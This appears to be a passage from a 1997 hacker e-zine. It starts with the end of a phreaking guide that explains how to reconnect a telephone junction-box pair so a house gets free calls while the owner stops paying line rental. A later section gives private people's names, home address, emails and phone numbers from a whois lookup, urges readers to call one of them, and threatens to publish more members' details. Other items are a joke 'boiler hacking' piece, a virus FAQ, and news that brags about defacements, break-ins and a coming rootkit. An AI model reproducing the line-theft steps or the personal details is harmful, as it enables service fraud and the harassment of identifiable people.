The Struts are divided up into hundreds , So if your "P" was 360 you go along
to the third strut and down until you find the tiny number 60 next to a hole.
(see fig 1.18291739)In this hole should be some wire's, with luck they should
be yours. Pull the wires out of the white-box and reconnect it to the wire
pair going to your house. (the use of radios for checking might be a good
idea)
Fig 1.18291739
100-200 200-300 300-400 400-500 500-600 600-700 700-800 800-900
? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ?
? ? ?-360 ? ? ? ? ?
? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ?
Go Home And See if You Have A Dial Tone .
Congratulations....
Your house is now ready for free calls ..
Dial 175 and get your new fone Number
Your old line will be in limbo so you might as well stop paying line rental,
so tell B.T to disconnect it.
Notes for use: If You're Leaving the dodgy line permanent then make
sure you hide the wires well..
If you are going to get your old line cut-off then make
sure all your wiring is back as it was before.
Don't tell Stupid People your number.
Don't call Operators etc.
When we used this method we only connected the dodgy line when we needed it,
so I don't know what will happen if left on a permenent basis ???!"*
The information in this file came from alot of Trial & Error so some facts
may be incorrect.. (Anyway it worked for us!).
<You didnt learn this from me , and I didnt just tell you that ?Confused?>
----------- WildFire -----------
----------- AWOL '97 -----------
???????????????????????????????????????????????????????????????????????????????
===============================================================================
==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]==
===============================================================================
???????????????????????????????????????????????????????????????????????????????
1. Hacking Electrical Items Part 2, The Sequel : Tetsu Khan
???????????????????????????????????????????????????????????????????????????????
LAst TiME wE WuZ Hax0Rin' ToAsTAz, So foR Dis TiMe i BeeN ThINkin On WhUT wE
ShOUld hAx0R, aNd I ThOUghT, "eYe WiLL WrItE AbOuT....BOiLAhS!!! YeS, ThOsE
boILaHs yEw FiNd In yOuR BaSEmEnt!!" AnD So I StArTed To pLaY ArouND WifF Muh
BoiLAh AT h0me, NoW Yew caN REwt YoUr BoILah Tew!!!
FiNDiNg OuT dA OS ThaT ThA BoiLaH iZ RuNNiN'
--------------------------------------------
yEw Can DeW ThIS 3 WayZ...
1: LeWk FoR a StIcKA On It DaT Sez.
2: FiNd A CoNsOle On DA BoiLAh, ThEn, If IT hAs A kEYbOArd (DepEndZ oN
MaNuFAcTuReR) tYpE "uname -a" AnD It WiLL Tell YeW!
3: FiNd Da ManUaL FoR YouR BOilaH (easiest way)
WhEn YoU KnOw YoUr BoILaHs oPeRATinG SyStEm, yEw cAN PRocEEd To Hax0R It...
---------------------------------------------------------------------------
Hax0RinG a BoILaH KaN BeE VeRy DangERous, LiKE Hax0Rin' A nuKelear PoWaHH
sTAtIon, So MaKe sHuRe YeW dO ThE fOLLowiNG...
1: PuT oN PrOtECtivE CloThInG, LikE GloVeS, AnD a hAT, aNd MaYBe a sCarF,
tHis Is BeCoS BaSEmEnts CaN bE CooOLD, aNd YEw WouLDnt WanT To CaTch A
ChiLL wOULd YeW?
2: MaKE ShURe YeW HaVE A SpAnnEr Or WreNCH, As YoU WiLL NeEd ThEsE tO FiNd
hIdDEn pOrTz AnD TeW Eye-PeE SpoOF fRom TruSteD HoStS (liKe a SinK, oR
A pIpE, Or A WaSHing MaChInE)
LiKE WiV ToAsTeRz, We wILL fiRsT nEeD tO FiNd HiDDeN PoRtS, So wE NeEd To
ScAn FoR tHem, bOilAhz ArE BiGGer tHan tOASterz, sO ThiS MaY tAke SoMe TiMe.
YeW cAn LeWk FoR SucH HiDDen PoRtS bY dOIng ThEsE tHinGs...
1: LeWKiNg ArOunD ThE BoILaH wIV yOUR EyeS.
2: TrAcInG PiPeS aLL ArOuND yOuR hOuSe (bit like traceroute programs do)
3: UsInG StEalTh TEkNiquEs By HidInG ArOuND yOuR hOuSE AnD LIsTENinG fOr
WaTeR, liKE FrOm TaPs aNd StUFf...
If YoU dOnT FiNd AnY HIdDen PoRtS, ThEN YeW cAN JuST LoGiN FrOM a WaSHiNG
MaChIne, Or OtHeR tRUstEd HoSt On ThE NeTwOrK, wHeN yOu COnnEcT tO tHa
BoiLaH FRoM tHe WasHiNg MaChINe YeW wiLL sEe sOmeThInG LiKe ThIs...
+-------------------+
| GEneRaL eLeKTrIk |
| M:0225 |
| S:b4588 |
| T:02 |
+-------------------+
BoiLaH OS RelEasE 2.54 (bIg BaAAadAss BoILaH)
login: BoiLaH
password: <--- We AttEmPtid ThE DeFauLt "BoiLaH"
------------------------------------------------------------
L0ghINn GRaNTiD
***************
------------------------------------------------------------
WeLKoMe To bOiLAh
[BOPR]
bOiLiNg OpErAtIoNS PlaN rEsPonSe
------------------------------------------------------------
login on tty[wAShInG mAcHiNE]
last login from BaTHrEwm.COM on tty[ShOwEr] at 7:43p.m.
1: sHuTDoWn
2: CoLd WaTeR
3: hOt wAtEr
4: UNiX TyPE SheLL ENViRONMEnT
If YeW GhET THiS YEW ArE COOL)(#*$ Ok NoW CHEwZe NuMbAhh 4, ThEn YeWsE
ThIS uniVeRSaL BoiLAhh ExPLoiT...
% fuck yew eye am eleet and k-r4d 'cos muh name iz ZeroCool!
fuck : command not found
% whoami
root
%
tHe bEst tImEs To ReWT BoILaHs Is lAtE aT nIgHt WhEn No-OnE Is LOggEd-In, CoS
In ThA dAY, yEw GEt uSeRs LoGgEd iN To DoWLoAd WatEr AnD ShIt.
eYe WiLL KoNItuE wItH oTheR ExAMplEs NeXt TiMe!
T_K
???????????????????????????????????????????????????????????????????????????????
2. Virus Definitions : so1o
???????????????????????????????????????????????????????????????????????????????
This is for all you lame fucks out there who say I infect your systems with
viruses, even when the only malicious shit I code are Windoze killers, anyway
here are a few definitions, just so you know what you're on about next time =)
What are computer viruses (and why should I worry about them)?
--------------------------------------------------------------
According to Fred Cohen's well-known definition, a COMPUTER VIRUS is a
computer program that can infect other computer programs by modifying
them in such a way as to include a (possibly evolved) copy of itself.
Note that a program does not have to perform outright damage (such as
deleting or corrupting files) in order to to be called a "virus".
However, Cohen uses the terms within his definition (e.g. "program"
and "modify") a bit differently from the way most anti-virus
researchers use them, and classifies as viruses some things which most
of us would not consider viruses.
Many people use the term loosely to cover any sort of program that
tries to hide its (malicious) function and tries to spread onto as
many computers as possible. (See the definition of "Trojan".) Be
aware that what constitutes a "program" for a virus to infect may
include a lot more than is at first obvious - don't assume too much
about what a virus can or can't do!
These software "pranks" are very serious; they are spreading faster
than they are being stopped, and even the least harmful of viruses
could be fatal. For example, a virus that stops your computer and
displays a message, in the context of a hospital life-support
computer, could be fatal. Even those who created the viruses could
not stop them if they wanted to; it requires a concerted effort from
computer users to be "virus-aware", rather than the ignorance and
ambivalence that have allowed them to grow to such a problem.
What is a Trojan Horse?
-----------------------
A TROJAN HORSE is a program that does something undocumented which the
programmer intended, but that the user would not approve of if he knew
about it. According to some people, a virus is a particular case of a
Trojan Horse, namely one which is able to spread to other programs
(i.e., it turns them into Trojans too). According to others, a virus
that does not do any deliberate damage (other than merely replicating)
is not a Trojan. Finally, despite the definitions, many people use
the term "Trojan" to refer only to a *non-replicating* malicious
program, so that the set of Trojans and the set of viruses are
disjoint.
What are the main types of PC viruses?
--------------------------------------
Generally, there are two main classes of viruses. The first class
consists of the FILE INFECTORS which attach themselves to ordinary
program files. These usually infect arbitrary .COM and/or .EXE
programs, though some can infect any program for which execution is
requested, such as .SYS, .OVL, .PRG, & .MNU files.
File infectors can be either DIRECT ACTION or RESIDENT. A direct-
action virus selects one or more other programs to infect each time
the program which contains it is executed. A resident virus hides
itself somewhere in memory the first time an infected program is
executed, and thereafter infects other programs when *they* are
executed (as in the case of the Jerusalem) or when certain other
conditions are fulfilled. The Vienna is an example of a direct-action
virus. Most other viruses are resident.
The second category is SYSTEM or BOOT-RECORD INFECTORS: those viruses
which infect executable code found in certain system areas on a disk
which are not ordinary files. On DOS systems, there are ordinary
boot-sector viruses, which infect only the DOS boot sector, and MBR
viruses which infect the Master Boot Record on fixed disks and the DOS
boot sector on diskettes. Examples include Brain, Stoned, Empire,
Azusa, and Michelangelo. Such viruses are always resident viruses.
Finally, a few viruses are able to infect both (the Tequila virus is
one example). These are often called "MULTI-PARTITE" viruses, though
there has been criticism of this name; another name is "BOOT-AND-FILE"
virus.
FILE SYSTEM or CLUSTER viruses (e.g. Dir-II) are those which modify
directory table entries so that the virus is loaded and executed
before the desired program is. Note that the program itself is not
physically altered, only the directory entry is. Some consider these
infectors to be a third category of viruses, while others consider
them to be a sub-category of the file infectors.
What is a stealth virus?
------------------------
A STEALTH virus is one which hides the modifications it has made in
the file or boot record, usually by monitoring the system functions
used by programs to read files or physical blocks from storage media,
and forging the results of such system functions so that programs
which try to read these areas see the original uninfected form of the
file instead of the actual infected form. Thus the viral modifications
go undetected by anti-viral programs. However, in order to do this,
the virus must be resident in memory when the anti-viral program is
executed.
Example: The very first DOS virus, Brain, a boot-sector infector,
monitors physical disk I/O and re-directs any attempt to read a
Brain-infected boot sector to the disk area where the original boot
sector is stored. The next viruses to use this technique were the
file infectors Number of the Beast and Frodo (= 4096 = 4K).
Countermeasures: A "clean" system is needed so that no virus is
present to distort the results. Thus the system should be built from
a trusted, clean master copy before any virus-checking is attempted;
this is "The Golden Rule of the Trade." With DOS, (1) boot from
original DOS diskettes (i.e. DOS Startup/Program diskettes from a
major vendor that have been write-protected since their creation);
(2) use only tools from original diskettes until virus-checking has
completed.
What is a polymorphic virus?
----------------------------
A POLYMORPHIC virus is one which produces varied (yet fully
operational) copies of itself, in the hope that virus scanners
will not be able to detect all instances of the virus.
One method to evade signature-driven virus scanners is self-encryption
with a variable key; however these viruses (e.g. Cascade) are not
termed "polymorphic," as their decryption code is always the same and
thus can be used as a virus signature even by the simplest, signature-
driven virus scanners (unless another virus or program uses the
identical decryption routine).
One method to make a polymorphic virus is to choose among a variety of
different encryption schemes requiring different decryption routines:
only one of these routines would be plainly visible in any instance of
the virus (e.g. the Whale virus). A signature-driven virus scanner
would have to exploit several signatures (one for each possible
encryption method) to reliably identify a virus of this kind.
A more sophisticated polymorphic virus (e.g. V2P6) will vary the
sequence of instructions in its copies by interspersing it with
"noise" instructions (e.g. a No Operation instruction, or an
instruction to load a currently unused register with an arbitrary
value), by interchanging mutually independent instructions, or even by
using various instruction sequences with identical net effects (e.g.
Subtract A from A, and Move 0 to A). A simple-minded, signature-based
virus scanner would not be able to reliably identify this sort of
virus; rather, a sophisticated "scanning engine" has to be constructed
after thorough research into the particular virus.
The most sophisticated form of polymorphism discovered so far is the
MtE "Mutation Engine" written by the Bulgarian virus writer who calls
himself the "Dark Avenger". It comes in the form of an object module.
Any virus can be made polymorphic by adding certain calls to the
assembler source code and linking to the mutation-engine and
random-number-generator modules.
The advent of polymorphic viruses has rendered virus-scanning an ever
more difficult and expensive endeavor; adding more and more search
strings to simple scanners will not adequately deal with these
viruses.
What is a companion virus?
--------------------------
A COMPANION virus is one which, instead of modifying an existing file,
creates a new program which (unknown to the user) gets executed by the
command-line interpreter instead of the intended program. (On exit,
the new program executes the original program so that things will
appear normal.) The only way this has been done so far is by creating
an infected .COM file with the same name as an existing .EXE file.
Note that those integrity checkers which look only for *modifications*
in *existing* files will fail to detect such viruses.
(Note that not all researchers consider this type of malicious code
to be a virus, since it does not modify existing files.)
Miscellaneous Jargon and Abbreviations
--------------------------------------
BSI = Boot Sector Infector: a virus which takes control when the
computer attempts to boot (as opposed to a file infector).
CMOS = Complementary Metal Oxide Semiconductor: A memory area that is
used in AT and higher class PCs for storage of system information.
CMOS is battery backed RAM (see below), originally used to maintain
date and time information while the PC was turned off. CMOS memory
is not in the normal CPU address space and cannot be executed. While
a virus may place data in the CMOS or may corrupt it, a virus cannot
hide there.
DOS = Disk Operating System. We use the term "DOS" to mean any of the
MS-DOS, PC-DOS, or DR DOS systems for PCs and compatibles, even
though there are operating systems called "DOS" on other (unrelated)
machines.
MBR = Master Boot Record: the first Absolute sector (track 0, head 0,
sector 1) on a PC hard disk, that usually contains the partition table
(but on some PCs may simply contain a boot sector). This is not the
same as the first DOS sector (Logical sector 0).
RAM = Random Access Memory: the place programs are loaded into in
order to execute; the significance for viruses is that, to be active,
they must grab some of this for themselves. However, some virus
scanners may declare that a virus is active simply when it is found
in RAM, even though it might be simply left over in a buffer area of
RAM rather than truly being active.
TOM = Top Of Memory: the end of conventional memory, an architectural
design limit at the 640K mark on most PCs. Some early PCs may not
be fully populated, but the amount of memory is always a multiple of
64K. A boot-record virus on a PC typically resides just below this
mark and changes the value which will be reported for the TOM to the
location of the beginning of the virus so that it won't get
overwritten. Checking this value for changes can help detect a
virus, but there are also legitimate reasons why it may change.
A very few PCs with unusual memory managers/settings may
report in excess of 640K.
TSR = Terminate but Stay Resident: these are PC programs that stay in
memory while you continue to use the computer for other purposes;
they include pop-up utilities, network software, and the great
majority of viruses. These can often be seen using utilities such as
MEM, MAPMEM, PMAP, F-MMAP and INFOPLUS.
???????????????????????????????????????????????????????????????????????????????
3. Fun With whois, sinnerz.com : so1o
???????????????????????????????????????????????????????????????????????????????
Lewk WhuT eyE FoUnd...
phish:~> whois sinerz.com
[rs.internic.net]
SIN (SINNERZ3-DOM)
130 105th Ave. S.E. Apt. 218
Bellevue, Wa 98004
USA
Domain Name: SINNERZ.COM
Administrative Contact:
Kimminau, Suzette (SK2455) evilchic@NWLINK.COM
(206)454-7176
Technical Contact, Zone Contact:
Schmittel, Blair (BS469) blair@CYBER-NAUT.COM
(801)654-3139
Record last updated on 26-Mar-97.
Record created on 26-Mar-97.
Domain servers in listed order:
STRECH.CYBER-NAUT.COM 192.41.77.5
ITIS.EASILINK.COM 192.41.78.2
The InterNIC Registration Services Host contains ONLY Internet Information
(Networks, ASN's, Domains, and POC's).
Please use the whois server at nic.ddn.mil for MILNET Information.
phish:~> fwhois sinnerz.com@nic.ddn.mil
[nic.ddn.mil]
No match for "SINNERZ.COM".
Please be advised that this whois server only contains DOD Information.
All INTERNET Domain, IP Network Number, and ASN records are kept in
the Internet Registry, RS.INTERNIC.NET.
-------------------------------------------------------------------------------
=--> S.I.N : [S] cared sh [I] tless lame fucks not-so-a [N] onymous. <--=
-------------------------------------------------------------------------------
If sIn play this down as fake, why not phone up Evil Chic and ask if Suzey is
there? You will soon find out the truth =) Expect details of all sIn members
soon.
???????????????????????????????????????????????????????????????????????????????
4. Hacking Space Shuttles, Abort Codes : NailGun
???????????????????????????????????????????????????????????????????????????????
Okay, if you ever decide to hack a space shuttle (*.arc.nasa.gov is hacked very
frequently) and you actually plan it all out, make sure you collect all the
parts of this "mini-guide" of little things that are important and you will need
to know, this section concerns....
SPACE SHUTTLE ABORT MODES
-------------------------
Space Shuttle launch abort philosophy aims toward safe and intact
recovery of the flight crew, orbiter and its payload.
Abort modes include:
* Abort-To-Orbit (ATO) -- Partial loss of main engine thrust late enough
to permit reaching a minimal 105-nautical mile orbit with orbital
maneuvering system engines.
* Abort-Once-Around (AOA) -- Earlier main engine shutdown with the
capability to allow one orbit around before landing at Edwards Air
Force Base, Calif.; White Sands Space Harbor (Northrup Strip), N.M.;
or the Shuttle Landing Facility (SLF) at Kennedy Space Center, Fla..
* Trans-Atlantic Abort Landing (TAL) -- Loss of two main engines midway
through powered flight would force a landing at Banjul, The Gambia;
Ben Guerir, Morocco; or Moron, Spain.
* Return-To-Launch-Site (RTLS) -- Early shutdown of one or more engines
and without enough energy to reach Banjul would result in a pitch
around and thrust back toward KSC until within gliding distance of the
SLF.
STS-35 contingency landing sites are Edwards AFB, White Sands,
Kennedy Space Center, Banjul and Ben Guerir, Moron.
Next time we will probably look at the payloads of space shuttles, l8r.
???????????????????????????????????????????????????????????????????????????????
5. Country Domain Listing : SirLance
???????????????????????????????????????????????????????????????????????????????
Listing Of Domains By Country, like *.fr *.uk etc. etc.
AD - Andorra - Andorre
AE - Imarata al Arabiya al Muttahidah - Ittihad al Imirat alArabiya - United Ara
b Emirates
AF - Afghanistan - Afghanestan
AG - Antigua and Barbuda
AI - Anguilla
AL - Shqipëria - Albania
AM - Armenia - Hayastan
AN - Netherlands Antilles - Nederlandse Antillen
AO - Angola
AQ - Antarctica
AR - Argentina
AS - American Samoa
AT - Austria - Osterreich
AU - Australia
AW - Aruba
AZ - Azerbaijan - Azerbaycan
BA - Bosnia and Herzegovina - Bosna i Hercegovina
BB - Barbados
BD - Bangladesh
BE - Belgium - Belgique - Belgie
BF - Burkina
BG - Bulgaria
BH - Bahrain - Bahrayn
BI - Burundi
BJ - Benin
BM - Bermuda
BN - Brunei
BO - Bolivia
BR - Brazil - Brasil
BS - Bahamas
BT - Bhutan
BV - Bouvet Island - Bouvetoya
BW - Botswana
BY - Belarus - Byelarus'
BZ - Belize
CA - Canada
CC - Cocos (Keeling) Islands (Australia)
CF - Central Africa
CG - Congo
CH - Switzerland - Schweiz - Suisse - Svizzera - Svizra - Helvetia
CI - Cote d'Ivoire
CK - Cook Islands
CL - Chile
CM - Cameroon
CN - China
CO - Colombia
CR - Costa Rica
CS - Czechoslovakia
CU - Cuba
CV - Cape Verde - Cabo Verde
CX - Christmas Island (Australia)
CY - Cyprus
CZ - Czech Republic - Cechy
DD - Germany - Deutschland
DE - Germany - Deutschland
DJ - Djibouti
DK - Denmark - Danmark
DM - Dominica
DO - Dominican Republic - Republica Dominicana
DZ - Algeria - Jaza'ir
EC - Ecuador
EE - Estonia - Eesti
EG - Egypt - Misr
EH - Western Sahara
ER - Eritrea
ES - Spain - Espana
ET - Ethiopia - Ityop'iya
FI - Finland - Suomi
FJ - Fiji
FK - Falkland Islands
FM - Micronesia
FO - Faroe Islands - Faroyar
FR - France
FX - Metropolitan France
GA - Gabon
GB - United Kingdom
GD - Grenada
GE - Georgia - Sak'art'velo
GF - French Guiana - Guyane
GH - Ghana
GI - Gibraltar (UK)
GL - Greenland - Kalaallit Nunaat
GM - The Gambia
GN - Guinea - Guinee
GP - Guadaloupe (France)
GQ - Equatorial Guinea - Guinea Ecuatorial
GR - Greece - Ellas
GS - South Georgia
GT - Guatemala
GU - Guam
GW - Guinea-Bissau - Guine-Bissau
GY - Guyana
HK - Hong Kong (UK)
HM - Heard Island and McDonald Islands (Australia)
HN - Honduras
HR - Croatia - Hrvatska
HT - Haiti
HU - Hungary - Magyarorszag
ID - Indonesia
IE - Ireland - Éire
IL - Israel - Yisra'el
IN - India - Bharat
IO - Indian Ocean Territory (UK)
IQ - Iraq
IR - Iran
IS - Island - Iceland
IT - Italy - Italia
JM - Jamaica
JO - Jordan - Urdun
JP - Japan
KE - Kenya
KG - Kyrgyzstan
KH - Cambodia - Kampuchea
KI - Kiribati
KM - Comoros - Comores
KN - Saint Kitts and Nevis
KP - Korea - Choson
KR - Korea
KW - Kuwait - Kuwayt
KY - Cayman Islands
KZ - Kazakhstan
LA - Laos
LB - Lebanon - Lubnaniyah
LC - Saint Lucia
LI - Liechtenstein
LK - Sri Lanka
LR - Liberia
LS - Lesotho
LT - Lithuania - Lietuva
LU - Luxembourg
LV - Latvia - Latvija
LY - Libya - Libiya
MA - Morocco - Maghrib
MC - Monaca
MD - Moldova
MG - Madagascar
MH - Marshall Islands
MK - Macedonia - Makedonija
ML - Mali
MM - Burma - Myanma
MN - Mongolia - Mongol Uls
MO - Macau
MP - Northern Mariana Islands
MQ - Martinique (France)
MR - Mauritania - Muritaniyah
MS - Montserrat
MT - Malta
MU - Mauritius
MV - Maldives
MW - Malawi
MY - Malaysia
MZ - Mozambique - Mocambique
NA - Namibia
NC - New Caledonia - Nouvelle-Caledonie
NE - Niger
NF - Norfolk Island (Australia)
NG - Nigeria
NI - Nicaragua
NL - Netherlands - Nederland
NO - Norway - Norge
NP - Nepal
NR - Nauru
NU - Niue
NZ - New Zealand
OM - Oman - Uman
PA - Panama
PE - Peru
PF - French Polynesia - Polynesie Francaise
PG - Papua New Guinea
PH - Philippines - Pilipinas
PK - Pakistan
PL - Poland - Polska
PM - Saint-Pierre et Miquelon
PN - Pitcairn Islands
PR - Puerto Rico
PT - Portugal
PW - Palau - Belau
PY - Paraguay
QA - Qatar
RE - Reunion
RO - Romania
RU - Russia - Rossiya
RW - Rwanda
SA - Saudi Arabia - Arabiya as Suudiyah
SB - Solomon Islands
SC - Seychelles
SD - Sudan
SE - Sweden - Sverige
SG - Singapore - Singapura
SH - Saint Helena (UK)
SI - Slovenia - Slovenija
SJ - Svalbard og Jan Mayen
SK - Slovakia - Slovensko
SL - Sierra Leone
SM - San Marino
SN - Senegal
SO - Somalia
SR - Suriname
ST - Sao Tome e Principe
SU - Soviet Union - Sovietskiy Soyuz
SV - El Salvador
SY - Syria - Suriyah
SZ - Swaziland
TC - Turks and Caicos Islands
TD - Chad - Tchad
TF - Southern and Antarctic Lands - Terre Australes et Antarctiques
TG - Togo
TH - Thailand
TJ - Tajikistan - Tojikiston
TK - Tokelau (New Zealand)
TM - Turkmenistan - Tiurkmenostan
TN - Tunisia - Tunis
TO - Tonga
TP - Timor
TR - Turkey - Turkiye
TT - Trinidad and Tobago
TV - Tuvalu
TW - Taiwan - T'ai-wan
TZ - Tanzania
UA - Ukraine - Ukrayina
UG - Uganda
UM - United States Minor Outlying Islands
US - United States of America
UY - Uruguay
UZ - Uzbekistan - Uzbekiston
VA - Holy See
VC - Saint Vincent and the Grenadines
VE - Venezuela
VG - Virgin Islands (UK)
VI - Virgin Islands (USA)
VN - Vietnam - Viet Nam
VU - Vanuatu
WF - Wallis et Futuna
WS - Samoa
YD - Yemen
YE - Yemen
YT - Mayotte (France)
YU - Yugoslavia
ZA - South Africa
ZM - Zambia
ZR - Zaire
ZW - Zimbabwe
???????????????????????????????????????????????????????????????????????????????
===============================================================================
==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]==
===============================================================================
???????????????????????????????????????????????????????????????????????????????
1. CoreWars : so1o / od|phreak
???????????????????????????????????????????????????????????????????????????????
od|phreak was telling me about an idea he had, then called just "Hacker Wars"
it was about teams, or groups of hackers who had a league system and hacked
each others systems to gain points...
We both made sets of rules and decided on a name also, CoreWars...Here are the
rules as to date :
- 6 hackers per team.
- Each team has 2 systems.
- The systems must run linux, and be up 24/7.
- The game is played from a friday at
midnight to a sunday at midnight (48 hours).
- On systems owned by the team, each user may have one
account, with any systems priveleges.
- Each team has 1 account on each enemy system
- 2.5mb quota per account
- must be a normal user
Rules :
-------
- super users on opposing teams are NOT allowed to
intervine with other hackers, this includes killing,
writing to their terminals, or disturbing them in
any way shape or form, however, super users are
allowed to use snoop and other programs to monitor
opposing team members, but they cannot DIRECTLY
step in and kill the user. super users CANNOT delete
files created by the opposing team members, however
they ARE allowed to delete files if they have been
MODIFIED, like /etc/motd.
- teams conquer a system by forcing it to be shut down,
switched off, or any other measure that prevents
persons from connecting or using that system. This
can include rm'ng the hard drive or any other suitable
measure.
The Winning Team Is The Last Team With A System That
Has Not Been Shut Down.
if you shut a system down : 100 points
if your system gets shut down : -50 points
if you keep both of your systems up : 25 points
if you lose both of your systems : -25 points
On Sunday midnight, all points are worked out, and
the league positions are calculated.
These Rules Are Currently Being Changed : http://www.neonunix.org/corewars/
Suggestions to myself or od|phreak...
So, if you have a team of 6 that you would like to enter in CoreWars, mail
corewars@<codezero's new domain that's not yet decided here> with your team
name, details, system IP and other relevant information...
???????????????????????????????????????????????????????????????????????????????
2. Technophoria Want A Piece Of CodeZero Too? : so1o
???????????????????????????????????????????????????????????????????????????????
Technophoria, based at www.technophoria.com, did *NOT* hack our webpage at
www.neonunix.org/codezero/ as i dont even have a l/p to neonunix.org, anyway,
they uploaded this shiznit to the page, obviously with neonunix's account,
which is the only one on the system...
Dont talk shit about Technophoria<br><br><br>-Particle Man<br><Br>
<embed src="particle.wav"loop=true> <meta refresh="http://www.technophoria.com">
Hmmm, who the fuck is Particle Man?! last time I checked the Technophoria member
list it had...
Deprave
BroncBuster
Sludge
Acid Angel
Modify
The Messiah
Banshee
Now, I dont get on well with Modify or The Messiah (who are in like, 3 other
groups each) but Deprave is a good friend, Sludge and Acid I have never met
and Bronc is cool. I dont know whats goin down wit that shit, but the last
thing I need is some punk trying to say that I write shit about Technophoria,
seeing I have never written a thing about them, but anyway, if you do visit
the Technophoria WWW site, you will see that sIn and Technophoria are working
on the same project with the same people, Utopia (mentioned in the last issue
by *OD?PHREAK*) I wonder who will take the credit and / or release the actual
program, hmm..I talked to The Messiah...
<TheMessiah> Utopia will be a encryption utility, release by
SIN/Technophoria, written by The Messiah and Fucking Hostile.
<TheMessiah> No release date is given.
<so1o> encryption util?
<so1o> for what purposes?
<TheMessiah> Encrypting files, clipboard, and an editor, like Puffer.
<so1o> thru windoze?
<TheMessiah> Yes.
<so1o> ahh
<TheMessiah> 16 bit.
<TheMessiah> With plans for a 32 bit version.
<so1o> because doesnt pgp do that and alot more?
<TheMessiah> No, it doesn't.
<so1o> what kind of encryption are we talking about?
<TheMessiah> PGP only uses ONE algorithm, IDEA.
<TheMessiah> About 16 different algorithms.
<so1o> and yours will use?
<TheMessiah> RC4, RC5, IDEA, Blowfish, DES, SuperIDEA...
<TheMessiah> I'm still looking into that...
<so1o> isnt that just ripping other peoples shit?
<so1o> blatently
<TheMessiah> No.
<TheMessiah> If so then PGP is ripping.
<TheMessiah> Puffer is ripping.
<TheMessiah> The source for almost all algorihtms is released.
<TheMessiah> So ppl can evaluate it..
<so1o> what about RC5 source then?
<TheMessiah> Have it.
<so1o> okay...
<so1o> so you have all your algorithms
<TheMessiah> RSA condones non-commercial use of RC4 and RC5.
<TheMessiah> Pretty much.
<so1o> but how will the program work then?
<TheMessiah> Right now I'm wondering which algorihtms to put into it.
<so1o> will it have secret keys and public keys like pgp
<so1o> ?
<TheMessiah> You select an algorihtm, files, and hit encrypt...
<TheMessiah> No, symetric key encryption.
<TheMessiah> One password...
<so1o> isnt that a bit unsecure?
<TheMessiah> I'm making a public key encryption program later on...
<TheMessiah> No, it isn't.
<so1o> seeing then the password will have to be given to the other user
<so1o> over a medium such as IRC
<TheMessiah> You can't transmit keys, true...
<so1o> which can be logged
<TheMessiah> But this isn't for communication as much as file storgae...
<TheMessiah> People can use PGP to transmit keys...
<so1o> so what will the program include?
<TheMessiah> Hmmm... what won't it?
<TheMessiah> I'm hoping to include some steganography in it...
<TheMessiah> It'll be something like Puffer, only WAY better...
<so1o> okzy
<so1o> 1st release will be 16-bit
<so1o> right?
<TheMessiah> Yes...
<so1o> will it have any problems running thru 95 / NT
<so1o> ?
<TheMessiah> Nope.
<TheMessiah> I'm using Win95...
<so1o> will users need .dll files to run it?
<TheMessiah> One.
<TheMessiah> But that'll come included...
<TheMessiah> No VB bullshit...
<TheMessiah> It's made in Delphi, so the runtime library is in the EXE...
<so1o> delphi
<so1o> i code borland c++
<TheMessiah> Get C++ Builder then...
<so1o> i plan on doing so
<TheMessiah> Like Delphi, but uses C++...
<so1o> okie, l8r
<TheMessiah> cya
???????????????????????????????????????????????????????????????????????????????
3. Global kOS News And Questions / Answers : Spidey
???????????????????????????????????????????????????????????????????????????????
There have been several rumors circulating about what happened to us since
globalkos.org went down. They range from us being busted by feds to
stories about purple shrouds and phenobarbital. There have also been
rumors about dissention among our ranks and group infighting.
Q: What happened to globalkos.org? Did the feds shut it down? Did their
ISP shut it down? Did they move their site to keep it hidden?
A: Half of us didn't feel like paying for it. We weren't shut down, nor
is the site hidden out there somewhere. We're looking into alternatives.
Q: Did Acid Angel leave GkOS for Technophoria?
A: No. He is working with the guys at Technophoria, but he is still a part
of Global kOS.
Q: Did Silicon Toad leave the group altogether?
A: Somebody came up with this one on the basis of a broken link at
globalkos.org. ST moved his site, and no one bothered to update the link.
Through some stretch of logic this guy decided it meant ST split.
Q: What about Up Yours 4?
A: It's slated for release on March 30th.
Q: Did GkOS get busted?
A: No.
Q: I thought Cobra (Vortex, Morbid Disorder, Kludge, or Ryan) was a member of
GkOS.
A: I've never even heard of these people. They are not present, nor
former members.
Our members are:
Acid Angel
Glitch
Materva
Raven
Shadow Hunter
Silicon Toad
Spidey
That Guy
Zaven
Q: I heard there was a major disagreement within the group, and there's a
civil war going on between them. Is it true?
A: No. This is completely unfounded. Whoever started this one pulled it
straight out of his ass.
???????????????????????????????????????????????????????????????????????????????
4. www.ncaa.com Hack Makes News : so1o
???????????????????????????????????????????????????????????????????????????????
Conflict member TiK hacked www.ncaa.com, he made TV news, papers, and big
internet news, statements from the NCAA and other organisations can be found
on www.infowar.com, so1o never believed TiK would or could hack such a site
due to the high security levels, but good 'ole TiK proved us all wrong, expect
the index.html s00n!
???????????????????????????????????????????????????????????????????????????????
5. CodeZero To Release sunOS 5.x RootKit : so1o
???????????????????????????????????????????????????????????????????????????????
Yeah, werkin' on it, lewkout!!
???????????????????????????????????????????????????????????????????????????????
6. Too Many nethosting.com Break-Ins : so1o
???????????????????????????????????????????????????????????????????????????????
www.hawkee.com and many other "vservers" at nethosting.com have been hacked
or attacked, like sinnerz.com (although no damage was done to the site) and
so the admin at nethosting can't be very happy with their security, I was
talking to hawkee about the hacks into his system by two members of the
CodeZero (thats what the numbers stood for - minus 2 from each, turn the 0
into a 26, then 1 = A, 2 = B, 3 = C etc. = CODEZERO) and he was saying that
newhosting had really boosted their secruity, this was also the case when
access to cough-syrup.nethosting.com was gained by one single hacker, as after
the attack, the sendmail version was pumped from 8.8.4 to 8.8.5, nethosting are
also considering taking action to prevent certain hosts from having access to
the system.
???????????????????????????????????????????????????????????????????????????????
7. sulfur of #hack to print a bi-monthly magazine : so1o
???????????????????????????????????????????????????????????????????????????????
Access Denied will be printed by sulfur (Edward Givings) of #hack, free copies
will be distributed at Beyond Hope, it will be bi-monthly, so you get 6 issues a
year, as opposed to 4 of 2600, look out for it...
???????????????????????????????????????????????????????????????????????????????
8. 2600 printers go bust and take $9000 : so1o
